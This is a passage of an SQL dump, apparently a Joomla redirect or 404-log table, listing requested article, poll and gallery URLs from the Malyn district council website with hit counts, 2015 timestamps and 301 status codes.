00:00:00',301),(14012,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=527:2012-01-04-12-15-35&catid=11&Itemid=14&lang=uk','','','',2,0,'2015-06-01 09:04:07','0000-00-00 00:00:00',301),(14013,'http://malyn-rayrada.org.ua/index.php/143-hto-otrimae-cifrovi-tv-tjuneri-bezkoshtovno?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-01 09:18:09','0000-00-00 00:00:00',301),(14014,'http://malyn-rayrada.org.ua/index.php/186-vikonannja-dohidnoi-chastini-za-4-misjaci-v','','','',1,0,'2015-06-01 09:18:11','0000-00-00 00:00:00',301),(14015,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/758-informacija-josipivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-01 09:18:14','0000-00-00 00:00:00',301),(14016,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/779-informacija-ustinivskoi-silskoi-radi','','','',1,0,'2015-06-01 09:18:16','0000-00-00 00:00:00',301),(14017,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/779-informacija-ustinivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-01 09:18:19','0000-00-00 00:00:00',301),(14018,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/780-informacija-shevchenkivskoi-silskoi-radi','','','',4,0,'2015-06-01 09:18:22','0000-00-00 00:00:00',301),(14019,'http://malyn-rayrada.org.ua/index.php/212-do-vidoma-vodiiv?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-01 09:18:24','0000-00-00 00:00:00',301),(14020,'http://malyn-rayrada.org.ua/index.php/311-zaversheno-pidgotovku-do-provedennja-chergovoi_2?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-01 09:18:28','0000-00-00 00:00:00',301),(14021,'http://malyn-rayrada.org.ua/index.php/313-ispanija-chempion-evropi-z-futbolu?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-01 09:18:30','0000-00-00 00:00:00',301),(14022,'http://malyn-rayrada.org.ua/index.php/373-dani-pro-vikonannja-dohidnoi-chastini-za-9?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-01 09:18:33','0000-00-00 00:00:00',301),(14023,'http://malyn-rayrada.org.ua/index.php/389-shhodo-rozderzhavlennja-drukovanih-zasobiv-masovoi','','','',1,0,'2015-06-01 09:18:37','0000-00-00 00:00:00',301),(14024,'http://malyn-rayrada.org.ua/index.php/389-shhodo-rozderzhavlennja-drukovanih-zasobiv-masovoi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-01 09:18:40','0000-00-00 00:00:00',301),(14025,'http://malyn-rayrada.org.ua/index.php/442-vitaemo-z-novim-2013-rokom-ta-rizdvom-hristovim?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-01 09:18:44','0000-00-00 00:00:00',301),(14026,'http://malyn-rayrada.org.ua/index.php/448-v-s-zhuravskij-budu-perekonuvati-svoih-koleg','','','',4,0,'2015-06-01 09:18:47','0000-00-00 00:00:00',301),(14027,'http://malyn-rayrada.org.ua/index.php/511-vidpovid-korostenskoi-direkcii-zaliznichnih','','','',3,0,'2015-06-01 09:18:49','0000-00-00 00:00:00',301),(14028,'http://malyn-rayrada.org.ua/index.php/512-ukrainci-z-nedili-budut-spati-na-godinu-menshe','','','',3,0,'2015-06-01 09:18:52','0000-00-00 00:00:00',301),(14029,'http://malyn-rayrada.org.ua/index.php/553-do-vidoma-deputativ-rajonnoi-radi_2','','','',3,0,'2015-06-01 09:19:03','0000-00-00 00:00:00',301),(14030,'http://malyn-rayrada.org.ua/index.php/595-pro-perenesennja-dati-sklikannja-27-sesii-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-01 09:19:16','0000-00-00 00:00:00',301),(14031,'http://malyn-rayrada.org.ua/index.php/61-splivajut-ostanni-godini-dlja-podachi-dokumentiv?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-01 09:19:21','0000-00-00 00:00:00',301),(14032,'http://malyn-rayrada.org.ua/index.php/62-priznachennja-tizhnja?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-01 09:19:25','0000-00-00 00:00:00',301),(14033,'http://malyn-rayrada.org.ua/index.php/69-v-ukrainu-nadijshla-persha-partija-efirnih','','','',1,0,'2015-06-01 09:20:18','0000-00-00 00:00:00',301),(14034,'http://malyn-rayrada.org.ua/index.php/708-ugoda-z-vreguljuvannja-krizi-bude-pidpisana-v-12?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-01 09:20:23','0000-00-00 00:00:00',301),(14035,'http://malyn-rayrada.org.ua/index.php/709-informacijne-upravlinnja-aparatu-verhovnoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-01 09:20:27','0000-00-00 00:00:00',301),(14036,'http://malyn-rayrada.org.ua/index.php/725-pro-priznachennja-s-kizina-golovoju-zhitomirskoi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-01 09:20:30','0000-00-00 00:00:00',301),(14037,'http://malyn-rayrada.org.ua/index.php/726-nachalnik-ovruckogo-mrv-kvi-ivan-levchenko-alkogol?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-01 09:20:34','0000-00-00 00:00:00',301),(14038,'http://malyn-rayrada.org.ua/index.php/738-pro-chastkovu-mobilizaciju?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-01 09:20:37','0000-00-00 00:00:00',301),(14039,'http://malyn-rayrada.org.ua/index.php/75-vitaemo-iz-svjatom-8-bereznja?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-01 09:20:43','0000-00-00 00:00:00',301),(14040,'http://malyn-rayrada.org.ua/index.php/848-nachalnik-upravlinnja-derzhzemagentstva-u?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-01 09:21:00','0000-00-00 00:00:00',301),(14041,'http://malyn-rayrada.org.ua/index.php/855-pro-dostrokove-pripinennja-povnovazhen-verhovnoi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-01 09:21:03','0000-00-00 00:00:00',301),(14042,'http://www.malyn-rayrada.org.ua/index.php/186-vikonannja-dohidnoi-chastini-za-4-misjaci-v?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-06-01 09:21:16','0000-00-00 00:00:00',301),(14043,'http://www.malyn-rayrada.org.ua/index.php/550-ukraina-vidznachae-den-konstitucii?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-06-01 09:21:58','0000-00-00 00:00:00',301),(14044,'http://www.malyn-rayrada.org.ua/index.php/553-do-vidoma-deputativ-rajonnoi-radi_2?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-06-01 09:22:04','0000-00-00 00:00:00',301),(14045,'http://www.malyn-rayrada.org.ua/index.php/595-pro-perenesennja-dati-sklikannja-27-sesii-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-01 09:23:06','0000-00-00 00:00:00',301),(14046,'http://www.malyn-rayrada.org.ua/index.php/708-ugoda-z-vreguljuvannja-krizi-bude-pidpisana-v-12?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-06-01 09:24:51','0000-00-00 00:00:00',301),(14047,'http://www.malyn-rayrada.org.ua/index.php/709-informacijne-upravlinnja-aparatu-verhovnoi-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-06-01 09:24:54','0000-00-00 00:00:00',301),(14048,'http://www.malyn-rayrada.org.ua/index.php/713-biatlon-zhinocha-estafeta-zoloto?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-06-01 09:25:08','0000-00-00 00:00:00',301),(14049,'http://www.malyn-rayrada.org.ua/index.php/714-verhovna-rada-obrala-novim-spikerom-oleksandra?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-06-01 09:25:11','0000-00-00 00:00:00',301),(14050,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1295:-2014-&catid=36&Itemid=70&lang=en','','','',2,0,'2015-06-01 09:59:21','0000-00-00 00:00:00',301),(14051,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1136:-2013-2015-&catid=36&Itemid=70&lang=uk','','','',3,0,'2015-06-01 10:11:42','0000-00-00 00:00:00',301),(14052,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=5&Itemid=1&lang=en','','','',1,0,'2015-06-01 10:47:26','0000-00-00 00:00:00',301),(14053,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=301:2011-05-11-13-29-00&catid=11&Itemid=14&lang=uk','','','',6,0,'2015-06-01 11:31:08','0000-00-00 00:00:00',301),(14054,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1153:-2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2015-06-01 11:32:20','0000-00-00 00:00:00',301),(14055,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1336:2014-06-10-11-01-06&catid=36&Itemid=70&lang=ru','','','',1,0,'2015-06-01 11:34:27','0000-00-00 00:00:00',301),(14056,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1229:2014-02-28-09-49-28&catid=11&Itemid=14&lang=en','','','',3,0,'2015-06-01 12:12:38','0000-00-00 00:00:00',301),(14057,'http://www.malyn-rayrada.org.ua/index.php?option=com_poll&id=4:2010-08-13-08-15-19&lang=ru','','','',3,0,'2015-06-01 12:20:25','0000-00-00 00:00:00',301),(14058,'http://www.malyn-rayrada.org.ua/index.php?id=10:2013-02-22-07-29-10&lang=uk&option=com_poll','','http://go.mail.ru/search_images','',3,0,'2015-06-01 12:52:13','0000-00-00 00:00:00',301),(14059,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=909:2013-01-21-10-09-40&catid=36&Itemid=70&lang=en','','','',5,0,'2015-06-01 12:56:43','0000-00-00 00:00:00',301),(14060,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=713:2012-06-14-15-13-57&catid=43:--25072012-&Itemid=82&lang=en','','','',2,0,'2015-06-01 13:05:41','0000-00-00 00:00:00',301),(14061,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=61:2010-07-09-07-23-49&catid=11:2010-06-05-14-33-33&Itemid=16&lang=ru','','','',1,0,'2015-06-01 13:18:45','0000-00-00 00:00:00',301),(14062,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=75:2010-07-30-10-51-13&catid=11:2010-06-05-14-33-33&Itemid=16&lang=ru','','','',1,0,'2015-06-01 13:55:48','0000-00-00 00:00:00',301),(14063,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1148:29-2013-25-&catid=11&lang=en&Itemid=0','','','',1,0,'2015-06-01 14:16:07','0000-00-00 00:00:00',301),(14064,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=55&lang=en','','','',3,0,'2015-06-01 14:22:43','0000-00-00 00:00:00',301),(14065,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1086:2013-09-16-13-00-16&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2015-06-01 14:22:54','0000-00-00 00:00:00',301),(14066,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=755:2012-09-10-12-57-40&catid=11&lang=uk','','','',1,0,'2015-06-01 14:23:03','0000-00-00 00:00:00',301),(14067,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=909:2013-01-21-10-09-40&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',4,0,'2015-06-01 14:23:11','0000-00-00 00:00:00',301),(14068,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=840:-----------------2007-2015-&catid=36&Itemid=70&lang=en','','','',3,0,'2015-06-01 14:34:22','0000-00-00 00:00:00',301),(14069,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1229:2014-02-28-09-49-28&catid=11&lang=uk','','','',1,0,'2015-06-01 14:38:06','0000-00-00 00:00:00',301),(14070,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1195:2014-01-28-13-01-27&catid=36&Itemid=70&lang=ru','','','',3,0,'2015-06-01 14:39:31','0000-00-00 00:00:00',301),(14071,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=49:2010-06-16-14-16-00&catid=1&Itemid=10&lang=uk','','','',5,0,'2015-06-01 14:39:35','0000-00-00 00:00:00',301),(14072,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=77:2010-08-02-05-31-11&catid=11&Itemid=16&lang=uk','','','',2,0,'2015-06-01 14:52:10','0000-00-00 00:00:00',301),(14073,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=752:2012-09-04-12-05-12&catid=11&lang=en&Itemid=','','','',1,0,'2015-06-01 15:05:18','0000-00-00 00:00:00',301),(14074,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=403:2011-09-29-05-41-20&catid=11&lang=ru','','','',2,0,'2015-06-01 15:10:18','0000-00-00 00:00:00',301),(14075,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=950:2013-03-06-13-10-57&catid=11&lang=uk','','','',2,0,'2015-06-01 15:10:54','0000-00-00 00:00:00',301),(14076,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=529:2012-01-05-19-10-35&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2015-06-01 15:11:54','0000-00-00 00:00:00',301),(14077,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1105:2013-10-11-16-43-25&catid=11&lang=en&Itemid=0','','','',2,0,'2015-06-01 15:12:16','0000-00-00 00:00:00',301),(14078,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=297:q10-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2015-06-01 15:13:03','0000-00-00 00:00:00',301),(14079,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=78:2010-08-02-10-54-18&catid=11:2010-06-05-14-33-33&Itemid=16&lang=en','','','',3,0,'2015-06-01 15:17:10','0000-00-00 00:00:00',301),(14080,'http://www.malyn-rayrada.org.ua/index.php?option=com_poll&id=4:2010-08-13-08-15-19&lang=ru&Itemid=','','','',3,0,'2015-06-01 15:24:28','0000-00-00 00:00:00',301),(14081,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=500:-9-6-&catid=11&Itemid=14&lang=uk','','','',4,0,'2015-06-01 15:28:14','0000-00-00 00:00:00',301),(14082,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=77:2010-08-02-05-31-11&catid=11&Itemid=16&lang=en','','','',2,0,'2015-06-01 15:37:30','0000-00-00 00:00:00',301),(14083,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=203:2010-12-15-14-10-45&catid=29&Itemid=60&lang=en','','','',4,0,'2015-06-01 15:41:44','0000-00-00 00:00:00',301),(14084,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=255:2011-03-01-09-19-09&catid=11&Itemid=14&lang=uk','','','',4,0,'2015-06-01 15:46:42','0000-00-00 00:00:00',301),(14085,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=121:2010-09-08-08-42-57&catid=11:2010-06-05-14-33-33&Itemid=16&lang=ru','','','',3,0,'2015-06-01 15:47:49','0000-00-00 00:00:00',301),(14086,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=855:2012-12-12-14-22-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2015-06-01 15:52:02','0000-00-00 00:00:00',301),(14087,'http://www.malyn-rayrada.org.ua/index.php?option=com_poll&id=4:2010-08-13-08-15-19&lang=en&Itemid=','','','',2,0,'2015-06-01 15:55:49','0000-00-00 00:00:00',301),(14088,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=49:2010-06-16-14-16-00&catid=1&Itemid=10&lang=en','','','',3,0,'2015-06-01 16:00:02','0000-00-00 00:00:00',301),(14089,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1086:2013-09-16-13-00-16&catid=36&Itemid=70&lang=uk','','','',2,0,'2015-06-01 16:00:55','0000-00-00 00:00:00',301),(14090,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=465:-l-r-2011-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2015-06-01 16:01:59','0000-00-00 00:00:00',301),(14091,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1300:2014-04-25-07-21-54&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2015-06-01 16:02:28','0000-00-00 00:00:00',301),(14092,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=78:2010-08-02-10-54-18&catid=11&Itemid=16&lang=en','','','',2,0,'2015-06-01 16:03:15','0000-00-00 00:00:00',301),(14093,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=529:2012-01-05-19-10-35&catid=11&lang=en','','','',3,0,'2015-06-01 16:06:35','0000-00-00 00:00:00',301),(14094,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=751:-15-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2015-06-01 16:07:03','0000-00-00 00:00:00',301),(14095,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1148:29-2013-25-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2015-06-01 16:08:53','0000-00-00 00:00:00',301),(14096,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1183:2014-01-28-09-18-31&catid=11&Itemid=14&lang=ru','','','',2,0,'2015-06-01 16:11:46','0000-00-00 00:00:00',301),(14097,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=203:2010-12-15-14-10-45&catid=29&Itemid=60&lang=ru','','','',2,0,'2015-06-01 16:14:42','0000-00-00 00:00:00',301),(14098,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=297:q10-q&catid=11&lang=ru','','','',2,0,'2015-06-01 16:23:56','0000-00-00 00:00:00',301),(14099,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1335:2014-06-07-10-58-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2015-06-01 16:30:05','0000-00-00 00:00:00',301),(14100,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1194:-------------2012-2015--&catid=36&Itemid=70&lang=ru','','','',1,0,'2015-06-01 16:35:23','0000-00-00 00:00:00',301),(14101,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=777:2012-10-02-10-06-36&catid=45&Itemid=84&lang=en','','','',3,0,'2015-06-01 16:36:59','0000-00-00 00:00:00',301),(14102,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=42:-2010-&catid=1&Itemid=10&lang=en','','','',3,0,'2015-06-01 16:46:30','0000-00-00 00:00:00',301),(14103,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=752:2012-09-04-12-05-12&catid=11&lang=ru&Itemid=','','','',3,0,'2015-06-01 16:49:44','0000-00-00 00:00:00',301),(14104,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1136:-2013-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',7,0,'2015-06-01 16:52:47','0000-00-00 00:00:00',301),(14105,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1183:2014-01-28-09-18-31&catid=11&lang=uk','','','',2,0,'2015-06-01 16:54:31','0000-00-00 00:00:00',301),(14106,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=42:-2010-&catid=1:-14052010&Itemid=10&lang=uk','','','',2,0,'2015-06-01 16:55:24','0000-00-00 00:00:00',301),(14107,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=62:2010-07-09-11-26-02&catid=11:2010-06-05-14-33-33&Itemid=16&lang=en','','','',1,0,'2015-06-01 16:57:31','0000-00-00 00:00:00',301),(14108,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=77:2010-08-02-05-31-11&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',2,0,'2015-06-01 17:00:20','0000-00-00 00:00:00',301),(14109,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=69:2010-07-22-13-04-59&catid=11&Itemid=16&lang=ru','','','',1,0,'2015-06-01 17:10:22','0000-00-00 00:00:00',301),(14110,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=62:2010-07-09-11-26-02&catid=11&Itemid=16&lang=en','','','',2,0,'2015-06-01 17:31:55','0000-00-00 00:00:00',301),(14111,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1342:2014-06-12-09-42-47&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2015-06-01 17:38:21','0000-00-00 00:00:00',301),(14112,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=465:-l-r-2011-&catid=36&Itemid=70&lang=en','','','',2,0,'2015-06-01 17:39:05','0000-00-00 00:00:00',301),(14113,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1229:2014-02-28-09-49-28&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2015-06-01 17:42:33','0000-00-00 00:00:00',301),(14114,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1342:2014-06-12-09-42-47&catid=11&lang=en&Itemid=','','','',2,0,'2015-06-01 17:43:29','0000-00-00 00:00:00',301),(14115,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1105:2013-10-11-16-43-25&catid=11&Itemid=14&lang=ru','','','',6,0,'2015-06-01 17:48:12','0000-00-00 00:00:00',301),(14116,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=36&Itemid=70&lang=ru','','','',2,0,'2015-06-01 18:02:19','0000-00-00 00:00:00',301),(14117,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1229:2014-02-28-09-49-28&catid=11&lang=en&Itemid=','','','',2,0,'2015-06-01 18:07:22','0000-00-00 00:00:00',301),(14118,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=840:-----------------2007-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2015-06-01 18:13:04','0000-00-00 00:00:00',301),(14119,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=38:2010-06-11-09-28-19&catid=11&Itemid=16&lang=uk','','','',2,0,'2015-06-01 18:18:09','0000-00-00 00:00:00',301),(14120,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=49:2010-06-16-14-16-00&catid=1&Itemid=10&lang=ru','','','',3,0,'2015-06-01 18:21:28','0000-00-00 00:00:00',301),(14121,'http://www.malyn-rayrada.org.ua/index.php?Itemid=83&catid=44&id=756:-2012-&lang=uk&option=com_content&view=article','','','',5,0,'2015-06-01 18:21:51','0000-00-00 00:00:00',301),(14122,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1295:-2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',2,0,'2015-06-01 18:23:58','0000-00-00 00:00:00',301),(14123,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=78:2010-08-02-10-54-18&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',4,0,'2015-06-01 18:25:45','0000-00-00 00:00:00',301),(14124,'http://www.malyn-rayrada.org.ua/index.php?option=com_poll&id=2:2010-06-09-12-30-50&lang=en&Itemid=','','','',2,0,'2015-06-01 18:26:30','0000-00-00 00:00:00',301),(14125,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=62:2010-07-09-11-26-02&catid=11:2010-06-05-14-33-33&Itemid=16&lang=ru','','','',1,0,'2015-06-01 18:27:06','0000-00-00 00:00:00',301),(14126,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=512:2011-12-21-12-46-13&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2015-06-01 18:31:35','0000-00-00 00:00:00',301),(14127,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1105:2013-10-11-16-43-25&catid=11&Itemid=14&lang=en','','','',2,0,'2015-06-01 18:36:30','0000-00-00 00:00:00',301),(14128,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1229:2014-02-28-09-49-28&catid=11&lang=uk&Itemid=','','','',3,0,'2015-06-01 18:37:17','0000-00-00 00:00:00',301),(14129,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=55&lang=ru&limitstart=5','','','',2,0,'2015-06-01 18:49:33','0000-00-00 00:00:00',301),(14130,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11&Itemid=14&lang=en','','','',7,0,'2015-06-01 18:56:54','0000-00-00 00:00:00',301),(14131,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=836:-6732012&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2015-06-01 19:01:24','0000-00-00 00:00:00',301),(14132,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1136:-2013-2015-&catid=36&Itemid=70&lang=en','','','',6,0,'2015-06-01 19:02:28','0000-00-00 00:00:00',301),(14133,'http://www.malyn-rayrada.org.ua/index.php?option=com_poll&id=4:2010-08-13-08-15-19&lang=ru&Itemid=0','','','',1,0,'2015-06-01 19:06:47','0000-00-00 00:00:00',301),(14134,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=5&Itemid=32&lang=en','','','',2,0,'2015-06-01 19:14:30','0000-00-00 00:00:00',301),(14135,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=5&Itemid=32&lang=ru','','','',3,0,'2015-06-01 19:14:49','0000-00-00 00:00:00',301),(14136,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=950:2013-03-06-13-10-57&catid=11&Itemid=14&lang=en','','','',3,0,'2015-06-01 19:20:52','0000-00-00 00:00:00',301),(14137,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:--24--6-&catid=11&lang=ru&Itemid=','','','',2,0,'2015-06-01 19:26:19','0000-00-00 00:00:00',301),(14138,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:--24--6-&catid=11&lang=uk','','','',1,0,'2015-06-01 19:26:32','0000-00-00 00:00:00',301),(14139,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1028:-lr&catid=36&Itemid=70&lang=ru','','','',2,0,'2015-06-01 19:28:47','0000-00-00 00:00:00',301),(14140,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:------------2014--&catid=36&Itemid=70&lang=ru','','','',2,0,'2015-06-01 19:35:41','0000-00-00 00:00:00',301),(14141,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1105:2013-10-11-16-43-25&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2015-06-01 19:47:46','0000-00-00 00:00:00',301),(14142,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=38:2010-06-11-09-28-19&catid=11:2010-06-05-14-33-33&Itemid=16&lang=ru','','','',2,0,'2015-06-01 19:50:56','0000-00-00 00:00:00',301),(14143,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=755:2012-09-10-12-57-40&catid=11&lang=en','','','',3,0,'2015-06-01 20:03:50','0000-00-00 00:00:00',301),(14144,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=1:-14052010&layout=blog&Itemid=10&lang=en','','','',1,0,'2015-06-01 20:03:52','0000-00-00 00:00:00',301),(14145,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=765:-qq&catid=11&Itemid=14&lang=en','','','',2,0,'2015-06-01 20:11:51','0000-00-00 00:00:00',301),(14146,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1028:-lr&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2015-06-01 20:23:11','0000-00-00 00:00:00',301),(14147,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1300:2014-04-25-07-21-54&catid=11&lang=uk','','','',1,0,'2015-06-01 20:32:41','0000-00-00 00:00:00',301),(14148,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=403:2011-09-29-05-41-20&catid=11&Itemid=14&lang=ru','','','',1,0,'2015-06-01 20:36:01','0000-00-00 00:00:00',301),(14149,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=754:2012-09-10-11-03-35&catid=11&lang=en','','','',2,0,'2015-06-01 20:36:53','0000-00-00 00:00:00',301),(14150,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=521:--------------------2012-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',5,0,'2015-06-01 20:37:33','0000-00-00 00:00:00',301),(14151,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=117:2--65-------&catid=11:2010-06-05-14-33-33&Itemid=16&lang=en','','','',2,0,'2015-06-01 